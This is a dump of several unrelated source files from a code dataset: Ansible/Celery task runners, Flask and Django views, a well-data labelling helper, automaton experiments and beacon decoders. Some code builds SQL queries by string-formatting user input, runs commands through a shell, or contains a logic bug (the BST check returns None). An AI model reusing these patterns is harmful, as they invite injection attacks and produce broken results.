len(state.primaries) == len(initial_primaries) + 1\n assert len(state.primaries) == len(txnPoolNodeSet[0].primaries)\n\n\ndef test_future_primaries_replicas_decrease(looper, txnPoolNodeSet, sdk_pool_handle,\n sdk_wallet_stewards, tdir, tconf, allPluginsPath):\n assert len(txnPoolNodeSet) == 7\n\n initial_primaries = copy.copy(txnPoolNodeSet[0].primaries)\n last_ordered = txnPoolNodeSet[0].master_replica.last_ordered_3pc\n starting_view_number = checkViewNoForNodes(txnPoolNodeSet)\n\n # Decrease replicas count\n demote_node(looper, sdk_wallet_stewards[-1], sdk_pool_handle, txnPoolNodeSet[-2])\n txnPoolNodeSet.remove(txnPoolNodeSet[-2])\n ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet)\n\n 
new_view_no = checkViewNoForNodes(txnPoolNodeSet)\n assert new_view_no == starting_view_number + 1\n state = txnPoolNodeSet[0].write_manager.future_primary_handler.node_states[-1]\n assert len(state.primaries) + 1 == len(initial_primaries)\n assert len(state.primaries) == len(txnPoolNodeSet[0].primaries)\n\n for node in txnPoolNodeSet:\n node.write_manager.future_primary_handler.commit_batch = old_commit\n","sub_path":"plenum/test/audit_ledger/test_future_primaries_addition.py","file_name":"test_future_primaries_addition.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564689107","text":"\"\"\"\n输入学生考试成绩计算平均分\n\"\"\"\n\ndef main():\n \n number = int(input(\"请输入学生人数:\"))\n names = [None] * number\n scores = [None] * number\n \n for index in range(len(names)):\n names[index] = input(\"请输入第【%d】个学生的姓名:\" % (index + 1))\n scores[index] = float(input(\"请输入第【%d】个学生的成绩:\" % (index + 1)))\n \n totalScore = 0\n\n for index in range(len(names)):\n print(\"%s: %.1f 分\" % ( names[index], scores[index]))\n totalScore += scores[index]\n\n print(\"平均分为: %.1f\" % (totalScore / number))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"day07/avgscore.py","file_name":"avgscore.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418075232","text":"from celery import Celery\nimport subprocess\nfrom subprocess import Popen, PIPE\nfrom flansible import api, app, celery, task_timeout\nimport time\nimport re\nimport redis\n\nrdis = redis.StrictRedis(host='localhost', port=6379, db=0)\n\n@celery.task(bind=True, soft_time_limit=task_timeout, time_limit=(task_timeout+10))\ndef do_long_running_task(self, cmd, type='Ansible'):\n with app.app_context():\n \n has_error = False\n result = None\n output = ''\n self.update_state(state='PROGRESS',\n meta={'output': output, \n 'description': \"\",\n 'returncode': None})\n print(str.format(\"About to execute: {0}\", cmd))\n proc = Popen([cmd], stdout=PIPE, stderr=subprocess.STDOUT, shell=True)\n\n playstarted = 0\n taskstarted = 0\n totalTaskTime = 0\n totalPlayTime = 0\n\n # task name match\n tmatch = ''\n # playbook name match\n pmatch = ''\n taskName = re.compile('TASK \\[(\\w+[\\s+\\w+]+)]')\n playName = re.compile('PLAY \\[(\\w+[\\s+\\w+]+)]')\n\n for line in iter(proc.stdout.readline, ''):\n\n if re.match('^PLAY', line):\n p = playName.match(line)\n if p:\n playstarted = float(\"{:0.2f}\".format( time.time()))\n # Check for previous runtime in rdis\n pmatch = p.group(1)\n print(pmatch)\n # found previous runtime\n if rdis.exists(pmatch):\n # number of times run\n countkey = pmatch + \"_count\"\n rdis.incr(countkey)\n\n avg = \"{:0.2f}\".format( float(rdis.get(pmatch)) / float(rdis.get(countkey)))\n line = line.replace('\\n', '')\n line = str.format(\"{0} (Avg {1} secs, {2} runs) \\n\", line, avg, rdis.get(countkey))\n\n else:\n countkey = pmatch + \"_count\"\n # Play recap\n playended = float(\"{:0.2f}\".format( time.time()))\n totalPlayTime = float(\"{:0.2f}\".format((playended - playstarted)))\n\n if not rdis.exists(pmatch):\n rdis.set(pmatch, float(totalPlayTime))\n\n # Update rdis task total time\n ptime = float(\"{:0.2f}\".format(float(rdis.get(pmatch))))\n rdis.set(pmatch, float(ptime) + float(totalPlayTime) )\n\n # remove last new line\n line = line.replace('\\n', '')\n diffsign = ''\n diffval = 0\n\n avgtime = ptime / float(rdis.get(countkey))\n\n if avgtime < 
totalPlayTime :\n diffsign = \"+\"\n diffval = float(\"{:0.2f}\".format( (totalPlayTime - avgtime) ))\n\n elif avgtime > totalPlayTime :\n diffsign = \"-\"\n diffval = float(\"{:0.2f}\".format((avgtime - totalPlayTime)))\n line = str.format(\"{0} : {1} seconds ({2}{3} secs)\\n\", line, totalPlayTime , diffsign, diffval)\n \n if re.match('^TASK', line):\n taskstarted = \"{:0.2f}\".format( time.time())\n p = taskName.match(line)\n if p:\n # Check for previous runtime in rdis\n tmatch = p.group(1)\n print(tmatch)\n # found previous runtime\n if rdis.exists(tmatch):\n # number of times run\n countkey = tmatch + \"_count\"\n rdis.incr(countkey)\n\n avg = \"{:0.2f}\".format( float(rdis.get(tmatch)) / float(rdis.get(countkey)))\n line = line.replace('\\n', '')\n line = str.format(\"{0} (Avg {1} secs, {2} runs) \\n\", line, avg, rdis.get(countkey))\n\n if re.match('^(ok|changed|fatal)', line):\n totalTaskTime = float(\"{:0.2f}\".format((time.time() - float(taskstarted))))\n\n if not rdis.exists(tmatch):\n rdis.set(tmatch, float(totalTaskTime))\n\n # Update rdis task total time\n ttime = float(\"{:0.2f}\".format(float(rdis.get(tmatch))))\n rdis.set(tmatch, float(ttime) + float(totalTaskTime) )\n\n # remove last new line\n line = line.replace('\\n', '')\n\n diffsign = ''\n diffval = 0\n\n avgtime = ttime / float(rdis.get(countkey))\n\n if avgtime < totalTaskTime :\n diffsign = \"+\"\n diffval = float(\"{:0.2f}\".format( (totalTaskTime - avgtime) ))\n\n elif avgtime > totalTaskTime :\n diffsign = \"-\"\n diffval = float(\"{:0.2f}\".format((avgtime - totalTaskTime)))\n \n else:\n diffsign = ''\n diffval = 0.0\n\n line = str.format(\"{0} : {1} seconds ({2}{3} secs)\\n\", line, totalTaskTime , diffsign, diffval)\n # print(line)\n\n output = output + line\n self.update_state(state='PROGRESS', meta={'output': output, 'description': \"\", 'returncode': None})\n\n return_code = proc.poll()\n if return_code == 0:\n meta = {'output': output, \n 'returncode': proc.returncode,\n 'description': \"\"\n }\n self.update_state(state='FINISHED',\n meta=meta)\n elif return_code != 0:\n #failure\n meta = {'output': output, \n 'returncode': return_code,\n 'description': str.format(\"Celery ran the task, but {0} reported error\", type)\n }\n self.update_state(state='FAILED',\n meta=meta)\n if len(output) == 0:\n output = \"no output, maybe no matching hosts?\"\n meta = {'output': output, \n 'returncode': return_code,\n 'description': str.format(\"Celery ran the task, but {0} reported error\", type)\n }\n return meta\n","sub_path":"Flansible/flansible/celery_runner.py","file_name":"celery_runner.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"109047259","text":"from app import db\nfrom flask import render_template, request, redirect, url_for #current_app as app, not needed here, because we don't need to reference anything from the app instance, we only reference the main instance \nfrom app.blueprints.auth.models import User\nfrom app.blueprints.blog.models import Post \nfrom flask_login import login_user, current_user, logout_user, login_required \nfrom . import bp as main_bp\n\n\n## password HASHING + SALTING\n#HASHING - algo where a particular character has a specified translation; the con is that it can be deciphered\n#SALTING - encrypted password will be different for two identical passwords\n\n\n@main_bp.route('/')\ndef home():\n if current_user.is_authenticated:\n posts = current_user.followed_posts().all()\n else:\n posts = [] #for display 
to anonymous users \n context = {\n 'user': current_user,\n 'posts': posts \n # 'posts': Post.query.order_by(Post.date_created.desc()).all()\n }\n return render_template('home.html', **context)\n\n@main_bp.route('/profile')\n@login_required\ndef profile():\n context = {\n 'posts': [p for p in Post.query.order_by(Post.date_created.desc()).all() if p.user_id == current_user.id]\n }\n return render_template('profile.html', **context)\n\n@main_bp.route('/contact')\ndef contact():\n return render_template('contact.html')\n\n@main_bp.route('/explore') #pass that dictionary to my route \n@login_required\ndef explore(): \n context = {\n 'users': [user for user in User.query.all() if current_user.id != user.id ] # not showing myself as followers on explore page\n }\n return render_template('explore.html', **context)\n\n\n","sub_path":"app/blueprints/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"530410967","text":"\"\"\"myblog URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path, include \r\nfrom django.conf.urls import url\r\nfrom database import views\r\nfrom database.views import home_view, detail_view, user_create_view, delete_view, list_view, search\r\n\r\n\r\nurlpatterns = [\r\n path('', views.home_view, name='home'),\r\n path('detail//', views.detail_view, name='detail'),\r\n path('admin/', admin.site.urls),\r\n path('create/', user_create_view, name='create_view'),\r\n path('detail/', list_view, name='list'),\r\n\r\n path('api-auth/', include('rest_framework.urls')),\r\n path('api/', include('database.api.urls')),\r\n\r\n url(r'results/$', search, name=\"results\"),\r\n path('detail//update/', views.update_view, name='update'),\r\n url(r'^delete/(?P[0-9]+)/$', views.delete_view, name='delete_view'),\r\n]\r\n","sub_path":"myblog/myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"595394760","text":"from django.conf.urls import patterns, url\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom apiservice import views\nfrom django.conf.urls import include\n\n\nurlpatterns = patterns('',\n # For master list related stuff\n url(r'^usermasterlistitems/$', views.UserMasterListItemList.as_view()),\n url(r'^usermasterlistitems/(?P[0-9]+)/$', views.UserMasterListItemDetail.as_view()),\n #url(r'^usermasterlistitem/$', views.UserMasterListItemDetail.as_view()),\n\n # For Current list related stuff\n url(r'^usercurrentlistitems/$', views.UserCurrentListItemView.as_view()),\n url(r'^usercurrentlistitems/(?P[0-9]+)/$', views.UserCurrentListItemDetail.as_view()),\n\n # For user creation and listing\n url(r'^users/$', views.UserView.as_view()),\n url(r'^users/(?P[0-9]+)/$', 
views.UserView.as_view()),\n #url(r'^users/(?P[0-9]+)/$', views.UserDetail.as_view()),\n #url(r'^users/', views.UserView),\n\n # For master list item template actions\n url(r'^masterlistitemtemplates/$', views.MasterListItemTemplateList.as_view()),\n url(r'^masterlistitemtemplates/(?P[0-9]+)/$', views.MasterListItemTemplateDetail.as_view()),\n\n url(r'^createdefaultmasterlist', views.createDefaultMasterList),\n url(r'^createdefaultcurrentlist', views.createCurrentListFromMasterList),\n url(r'^additemtouserslist', views.addItemToUsersList),\n url(r'^getitemdetails', views.getItemDetails),\n url(r'^usercategories/$', views.UserCategoryView.as_view()),\n url(r'^userpreferences/$', views.UserPreferenceView.as_view()),\n url(r'^addusersdevice/$', views.addUsersDevice),\n\n)\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n\n#For authorizing the user ??\nurlpatterns += patterns('',\n url(r'^api-auth/', include('rest_framework.urls',\n namespace='rest_framework')),\n)\n\n# To login and get an auth token\nurlpatterns += patterns('',\n url(r'^api-token-auth/', 'rest_framework.authtoken.views.obtain_auth_token')\n)\n","sub_path":"apiservice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"253854296","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n def helper(node, lower=float('-inf'), upper=float('inf')):\n if not node:\n return True\n if not (node.val > lower and node.val < upper):\n return False\n\n return helper(node.left, lower, node.val) and helper(node.right, node.val, upper)\n\n return\n\n return helper(root)\n\n\nt1 = TreeNode(5)\nt1.left = TreeNode(3)\nt1.right = TreeNode(1)\nslu = Solution()\nprint(slu.isValidBST(t1))\n\nprint(float('-inf') < -1000000)\nprint(float('inf') > 1000000)\n","sub_path":"leetcode/python/medium/p098_isValidBST.py","file_name":"p098_isValidBST.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368457533","text":"import os\nimport datetime\nimport numpy\nimport pandas as pd\nfrom django.db import connection\nfrom django.conf import settings\n# 导入消息模块\nfrom django.contrib import messages\n\nfrom . 
import helper\nfrom .data_signal import API_func as img_save\n\n\ncursor = settings.DEFAULT_CURSOR\norcl_cursor = settings.ORACLE_CURSOR\n\n\ndef index_get_1(name):\n \"\"\"电参首页数据展示\"\"\"\n query_set = []\n if not name:\n # sql = 'SELECT ID, WELLID, CREATEDATE FROM (SELECT ROWNUM AS rowno, ID, WELLID, CREATEDATE FROM SKYCLOUD.DC_WELLCURVE WHERE ROWNUM <= 20) table_alias WHERE table_alias.rowno >= 11;'\n # orcl_cursor.execute(sql)\n # 查询前20调数据\n orcl_cursor.execute('SELECT ID, WELLID, CREATEDATE FROM SKYCLOUD.DC_WELLCURVE WHERE ROWNUM <= 100')\n rows = orcl_cursor.fetchall()\n if rows:\n for row in rows:\n well_dict = {}\n well_dict['id'] = row[0]\n well_dict['createdate'] = row[2]\n # 查询对应曲线的井名\n cursor.execute('SELECT WELLNAME FROM WELLNAME WHERE WELLID=%s' % row[1])\n well_row = cursor.fetchone()\n if well_row:\n well_dict['wellname'] = well_row[0]\n else:\n well_dict['wellname'] = None\n query_set.append(well_dict)\n else:\n query_set = query_set\n else:\n # 查询对应井名的曲线id\n cursor.execute('SELECT WELLID FROM WELLNAME WHERE WELLNAME=\"%s\"' % name)\n well_row = cursor.fetchone()\n if well_row:\n # 查询前20条曲线数据\n orcl_cursor.execute(\n 'SELECT ID, WELLID, CREATEDATE FROM (SELECT * FROM SKYCLOUD.DC_WELLCURVE WHERE WELLID={}) '\n 'WHERE ROWNUM <= 100'.format(well_row[0]))\n rows = orcl_cursor.fetchall()\n if rows:\n for row in rows:\n well_dict = {}\n well_dict['id'] = row[0]\n well_dict['createdate'] = row[2]\n well_dict['wellname'] = name\n query_set.append(well_dict)\n else:\n query_set = query_set\n\n return query_set\n\n\ndef tag_get_0(group_id, query_set, Tfilepath):\n \"\"\"标签页get请求\"\"\"\n # 处理过滤的翻页\n prev_image = query_set.filter(id__lt=group_id.id).first()\n next_image = query_set.filter(id__gt=group_id.id).last()\n # 翻页的id\n prev_image_id = prev_image.id if prev_image else None\n next_image_id = next_image.id if next_image else None\n\n data_tag, img_path = helper.insert_tag(group_id.id)\n data_tag.save()\n savepath = helper.original_data(group_id.id, Tfilepath)\n\n return prev_image_id, next_image_id, savepath, data_tag, img_path\n\n\ndef judge_period(wellname):\n \"\"\"判断井号是否存在周期\"\"\"\n well_list = helper.read_csv()\n\n if wellname in well_list:\n return True\n else:\n return False\n\n\ndef ori_data(request, id, Tfilepath):\n \"\"\"获取曲线原始数据\"\"\"\n # 查询对应曲线id数据\n orcl_cursor.execute('SELECT * FROM SKYCLOUD.DC_WELLCURVE WHERE ID=%s' % id)\n row = orcl_cursor.fetchone()\n if row:\n # 查询曲线对应的井名\n cursor.execute('SELECT WELLNAME FROM WELLNAME WHERE WELLID=%s GROUP BY WELLID' % row[1])\n wellname = cursor.fetchone()[0]\n else:\n wellname = ''\n\n # 查询单条曲线的9条数据\n orcl_cursor.execute('SELECT BSID, POINTVALUES FROM SKYCLOUD.DC_WELLCURVEITEM WHERE CURVEID=%s' % id)\n ori_data = orcl_cursor.fetchall()\n\n new_ori_data = []\n for data in ori_data:\n dict = {}\n dict['WELLNAME'] = wellname\n # 将datetime.datetime类型时间转换成时间字符串\n createdate = row[4].strftime(\"%Y-%m-%d %H:%M:%S\")\n dict['CREATEDATE'] = createdate\n dict['BSID'] = data[0]\n dict['POINTVALUES'] = data[1]\n new_ori_data.append(dict)\n ori_df = pd.DataFrame(new_ori_data)\n # 判断Tfile.csv中是否包含该井号和周期\n if judge_period(wellname) is False:\n savepath = None\n messages.success(request, \"此井号没有进行曲线周期预测!\")\n else:\n savepath = img_save.download_plot(ori_df, Tfilepath)\n\n \"\"\"获取电功图绝对路径\"\"\"\n tag_data = new_ori_data[0]\n createdate = tag_data['CREATEDATE']\n img_path = 'IMGdata/' + wellname + '_' + '_'.join([i for i in createdate.split(':')]) + '.jpg'\n\n tag_data['wellname'] = wellname\n tag_data['createdate'] = 
tag_data['CREATEDATE']\n # 判断电功图是否存在\n if os.path.exists(str(savepath)):\n tag_data['normalized_epd'] = os.path.join(settings.STATICFILES_DIRS[0], img_path)\n else:\n tag_data['normalized_epd'] = ''\n tag_data['labeled'] = False\n\n return savepath, tag_data, img_path\n\n\ndef tag_get_id(id):\n # 查询上一条曲线的曲线ID\n orcl_cursor.execute(\n \"SELECT ID FROM (SELECT ID FROM SKYCLOUD.DC_WELLCURVE WHERE ID<%s ORDER BY ID DESC) WHERE ROWNUM=1\" % id)\n prev_image = orcl_cursor.fetchone()\n # 查询下一条曲线的曲线ID\n orcl_cursor.execute(\n \"SELECT ID FROM (SELECT ID FROM SKYCLOUD.DC_WELLCURVE WHERE ID>%s ORDER BY ID) WHERE ROWNUM=1\" % id)\n next_image = orcl_cursor.fetchone()\n\n # 翻页的id\n prev_image_id = prev_image[0] if prev_image else None\n next_image_id = next_image[0] if next_image else None\n\n return prev_image_id, next_image_id\n\n\ndef tag_get_1(request, id, Tfilepath):\n \"\"\"标签数据存大表\"\"\"\n savepath, tag_data, img_path = ori_data(request, id, Tfilepath)\n\n # 数据库去重\n cursor.execute(\n \"SELECT * FROM electric_tag WHERE (wellname='%s' AND createdate='%s')\"\n % (tag_data['wellname'], tag_data['createdate']))\n rows = cursor.fetchall()\n if not rows:\n # 入库时间\n current_time = datetime.datetime.now()\n # current_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n # 大表数据插入\n sql = \"INSERT INTO electric_tag(id, wellname, createdate, original_data, original_epd, electric_pcd, \" \\\n \"normalized_epd, wellbore_tag_1, wellbore_tag_2, slowdown_box_tag, motor_belt_tag, balance_tag, \" \\\n \"remarks,path_id,labeled, create_time) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\n # 本次入库数据\n values = (id, tag_data['wellname'], tag_data['createdate'], '', '', '', tag_data['normalized_epd'], '', '', '',\n '', '', '', 0, tag_data['labeled'], current_time)\n\n cursor.execute(sql, values)\n connection.commit()\n else:\n row = rows[0]\n # 获取已经存在曲线的曲线标签数据\n tag_data['wellbore_tag_1'] = row[7]\n tag_data['wellbore_tag_2'] = row[8]\n tag_data['slowdown_box_tag'] = row[9]\n tag_data['motor_belt_tag'] = row[10]\n tag_data['balance_tag'] = row[11]\n tag_data['remarks'] = row[12]\n tag_data['labeled'] = row[14]\n\n return savepath, tag_data, img_path\n\n\ndef tag_update(id):\n \"\"\"更新标签数据\"\"\"\n # 查询需要更新曲线\n orcl_cursor.execute('SELECT * FROM SKYCLOUD.DC_WELLCURVE WHERE ID=%s' % id)\n row = orcl_cursor.fetchone()\n if row:\n createdate = row[4].strftime(\"%Y-%m-%d %H:%M:%S\")\n # 查询更新曲线的井名\n cursor.execute('SELECT WELLNAME FROM WELLNAME WHERE WELLID=\"%s\"' % row[1])\n wellname = cursor.fetchone()[0]\n else:\n wellname = None\n createdate = None\n\n return wellname, createdate\n\n\ndef form_post(form):\n \"\"\"获取post请求数据\"\"\"\n if form.is_valid():\n wellbore_tag_1 = form.cleaned_data.get('wellbore_tag_1')\n wellbore_tag_2 = form.cleaned_data.get('wellbore_tag_2')\n motor_belt_tag = form.cleaned_data.get('motor_belt_tag')\n balance_tag = form.cleaned_data.get('balance_tag')\n slowdown_box_tag = form.cleaned_data.get('slowdown_box_tag')\n remarks = form.cleaned_data.get('remarks')\n else:\n wellbore_tag_1 = ''\n wellbore_tag_2 = ''\n motor_belt_tag = ''\n balance_tag = ''\n slowdown_box_tag = ''\n remarks = ''\n\n return wellbore_tag_1, wellbore_tag_2, motor_belt_tag, balance_tag, slowdown_box_tag, remarks\n\n","sub_path":"power_label/apps/label/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"83856643","text":"from DAWG import contruir_dawg, 
contruir_dawg_arquivo, testar_dawg_arquivo, testar_dawg_arquivo_convertendo_AFD\nfrom utils import open_automaton, convert_afn_to_afd\nimport AFN\nimport AFD\n\nafd_1 = open_automaton('afd_1.json')\ncheck = AFD.testar_string(afd_1, '0110')\nprint(check)\n\nafn_1 = open_automaton('afn_1.json')\ncheck = AFN.testar_string(afn_1, '0110')\nprint(check)\n\nafn_2 = open_automaton('afn_2.json')\nafd = convert_afn_to_afd(afn_2)\nprint(afd)\n\nafn_3 = open_automaton('afn_3.json')\nafd = convert_afn_to_afd(afn_3)\nprint(afd)\n\nafn_4 = open_automaton('afn_4.json')\nafd = convert_afn_to_afd(afn_4)\nprint(afd)\n\n# =============== dawg videos===========\nSp = ['aba', 'baa', 'b']\nSm = ['a', 'bab', 'aaa']\n\nprint(contruir_dawg(Sp, Sm, ['a', 'b']))\n\n# ================= dawg arquivos\ndawg = contruir_dawg_arquivo('waltz.txt')\ntestar_dawg_arquivo(dawg, 'waltzdb.csv')\ntestar_dawg_arquivo_convertendo_AFD(dawg, 'waltzdb.csv')\n","sub_path":"experimentos.py","file_name":"experimentos.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"355488373","text":"#!/usr/bin/python\n# print(\"Content-Type: text/html\\n\")\n# print()\n# decode functions\n\n# -*- coding: utf-8 -*-\n\n\n# updated July 12, 2017\n\n\nBAUDOT = {\n \"111000\": \"A\",\n \"110011\": \"B\",\n \"101110\": \"C\",\n \"110010\": \"D\",\n \"110000\": \"E\",\n \"110110\": \"F\",\n \"101011\": \"G\",\n \"100101\": \"H\",\n \"101100\": \"I\",\n \"111010\": \"J\",\n \"111110\": \"K\",\n \"101001\": \"L\",\n \"100111\": \"M\",\n \"100110\": \"N\",\n \"100011\": \"O\",\n \"101101\": \"P\",\n \"111101\": \"Q\",\n \"101010\": \"R\",\n \"110100\": \"S\",\n \"100001\": \"T\",\n \"111100\": \"U\",\n \"101111\": \"V\",\n \"111001\": \"W\",\n \"110111\": \"X\",\n \"110101\": \"Y\",\n \"110001\": \"Z\",\n \"100100\": \" \",\n \"011000\": \"-\",\n \"010111\": \"/\",\n \"001101\": \"0\",\n \"011101\": \"1\",\n \"011001\": \"2\",\n \"010000\": \"3\",\n \"001010\": \"4\",\n \"000001\": \"5\",\n \"010101\": \"6\",\n \"011100\": \"7\",\n \"001100\": \"8\",\n \"000011\": \"9\",\n \"010110\": \"?\",\n \"000000\": \"?\",\n \"100000\": \"\",\n}\n\n\ndef calcbch(binary, gx, b1start, b1end, b2end):\n bchlist = list(binary[b1start:b1end] + \"0\" * (b2end - b1end))\n for i in range(b1end - b1start):\n if bchlist[i] == \"1\":\n for k in range(len(gx)):\n if bchlist[i + k] == gx[k]:\n bchlist[i + k] = \"0\"\n else:\n bchlist[i + k] = \"1\"\n return \"\".join(bchlist)[b1end - b2end :]\n\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\ndef getFiveCharChecksum(bcnId):\n returnLimit = 1048576 # used to limit the return value to a 20 bit result\n runningSumLimit = 538471 # large prime which will not cause an overflow\n constPrimVal = 3911 # small prime value that stays constant throughout\n modifierLimit = 3847 # small prime which will not cause an overflow\n modifier = 3803 # modifier, simply initialized to a prime value\n runningSum = 0 # variable to hold the running value of the checksum\n tmpLongValue = 0 # holds temporary data\n decimalValue = 0 # holds decimal value for character\n ## Note: int data type is 4 bytes, largest positive value is 2,147,483,647 and\n ##\t all computations are designed to remain within this value (no overflows)\n i = 0\n for char in bcnId:\n decimalValue = int(ord(char))\n tmpLongValue = (runningSum * modifier) + decimalValue\n # on last character here use the higher resolution result as input to final 
truncation\n if i == len(bcnId) - 1:\n runningSum = tmpLongValue % returnLimit\n # print(runningSum)\n else:\n runningSum = tmpLongValue % runningSumLimit\n # print(tmpLongValue,runningSumLimit,runningSum)\n modifier = (constPrimVal * modifier) % modifierLimit\n i += 1\n return str(\n hex(runningSum)[2:].upper().zfill(5)\n ) #'Checksum: {} ({})'.format(hex(runningSum)[2:].upper().zfill(5),runningSum)\n\n\ndef dec2bin(n, ln=None):\n \"\"\"convert denary integer n to binary string bStr\"\"\"\n n = int(n)\n bStr = \"\"\n\n if n < 0:\n raise ValueError(\"must be a positive integer.\")\n # if n == 0: return '0'\n while n > 0:\n bStr = str(n % 2) + bStr\n n = n >> 1\n if not ln:\n l = len(bStr)\n else:\n l = ln\n b = \"0\" * (l - len(bStr)) + bStr\n return b\n\n\ndef is_neg(s):\n if s < 0:\n return -1\n else:\n return 1\n\n\ndef bin2dec(s):\n return int(s, 2)\n\n\ndef bin2hex2(binval):\n return str(hex(int(binval, 2)))[2:].upper().strip(\"L\")\n\n\ndef hextobin(hexval):\n \"\"\"\n Takes a string representation of hex data with\n arbitrary length and converts to string representation\n of binary. Includes padding 0s\n \"\"\"\n thelen = len(hexval) * 4\n hexval = str(hexval)\n\n try:\n binval = bin(int(hexval, 16))[2:]\n except ValueError:\n return False\n while (len(binval)) < thelen:\n binval = \"0\" + binval\n return binval\n\n\ndef baudot(binstr, startpos, endpos, short=False):\n if short:\n jump = 5\n one = \"1\"\n else:\n jump = 6\n one = \"\"\n # baudot string values are 6 bit length binary with following code reference\n baudot = BAUDOT\n baudstr = b = \"\"\n\n while startpos < endpos:\n\n try:\n b = baudot[one + binstr[startpos : startpos + jump]]\n\n except KeyError:\n b = \"?\"\n\n startpos += jump\n baudstr = baudstr + b\n return baudstr\n\n\ndef latlongresolution(binary, startpos, endpos):\n # PDF-2 from 20 or 14 bits starting from bit 113\n # Standard Location Procols are 20 bit length ( bits 113 to 132) with from 0-30 minutes resolution adjustment\n # and 0 to 60 secondsresolution in 4 second increments.\n # National Location Protocol are 14 bit length - Bits 113 to 126 express 0-3 minute resultions and 0-60 second,(4 sec) increments resolution.\n #\n\n l = endpos - startpos\n\n if binary[startpos] == \"0\": # 1 bit (113)\n signlat = -1\n latdir = \"negative\"\n else:\n signlat = 1\n latdir = \"positive\"\n\n if l == 20:\n # Standard Location Protocol is 20 bits of data.\n # Five bits for minutes of max 30 minute adjustment\n\n latminutes = float(bin2dec(binary[startpos + 1 : startpos + 6])) # 5 bits\n latseconds = float(\n bin2dec(binary[startpos + 6 : startpos + 10]) * 4\n ) # 4 bits\n longminutes = float(bin2dec(binary[startpos + 11 : startpos + 16])) # 5 bits\n longseconds = float(\n bin2dec(binary[startpos + 16 : startpos + 20]) * 4\n ) # 4 bits\n\n if binary[startpos + 10] == \"0\": # 1 bit\n signlong = -1\n lndir = \"negative\"\n else:\n signlong = 1\n lndir = \"positive\"\n\n elif l == 14:\n # National Location Protocol is 14 bits of data.\n # Only 2 bits for minutes of max 3 minute adjustment\n latminutes = float(bin2dec(binary[startpos + 1 : startpos + 3])) # 2 bits\n latseconds = float(bin2dec(binary[startpos + 3 : startpos + 7]) * 4) # 4 bits\n longminutes = float(bin2dec(binary[startpos + 8 : startpos + 10])) # 2 bits\n longseconds = float(\n bin2dec(binary[startpos + 10 : startpos + 14]) * 4\n ) # 4 bits\n if binary[startpos + 7] == \"0\": # 1 bit\n signlong = -1\n lndir = \"negative\"\n else:\n signlong = 1\n lndir = \"positive\"\n\n elif l == 18:\n # print 
'rls',binary[startpos+14:startpos+20]\n # RLS or ELT-DT Location Protocol is 18 bits of data.\n # Only 4 bits for minutes of max 15 minute adjustment\n latminutes = float(bin2dec(binary[startpos + 1 : startpos + 5])) # 4 bits\n latseconds = float(bin2dec(binary[startpos + 5 : startpos + 9]) * 4) # 4 bits\n longminutes = float(bin2dec(binary[startpos + 10 : startpos + 14])) # 4 bits\n longseconds = float(\n bin2dec(binary[startpos + 14 : startpos + 18]) * 4\n ) # 4 bits\n if binary[startpos + 9] == \"0\": # 1 bit\n signlong = -1\n lndir = \"negative\"\n else:\n signlong = 1\n lndir = \"positive\"\n\n else:\n # Bad length. Length must be 14,18 or 20.\n return False\n\n if int(latminutes) > 30:\n longoffset = latoffset = \"Default - no location\"\n\n elif int(latseconds) == 60 and latdir == \"positive\":\n latoffset = longoffset = \"Default - no location\"\n\n else:\n latoffset = \"{} minutes {} seconds ({})\".format(latminutes, latseconds, latdir)\n longoffset = \"{} minutes {} seconds ({})\".format(\n longminutes, longseconds, lndir\n )\n return (\n signlat * (float(latminutes / 60) + float(latseconds / 3600)),\n signlong * (float(longminutes / 60) + float(longseconds / 3600)),\n latoffset,\n longoffset,\n )\n\n\ndef latitudeRLS(latsono, latdeg):\n if latsono == \"1\":\n latdir = \"South\"\n sg = -1\n else:\n latdir = \"North\"\n sg = 1\n deg = float(bin2dec(latdeg)) / float(2)\n decimal = sg * deg\n if deg > 90:\n if \"0\" not in latdeg:\n lat = decimal = \"Default - no location\"\n else:\n lat = decimal = \"Error >90 (Deg:{})\".format(decimal)\n else:\n lat = str(deg) + \" Degrees \" + latdir\n 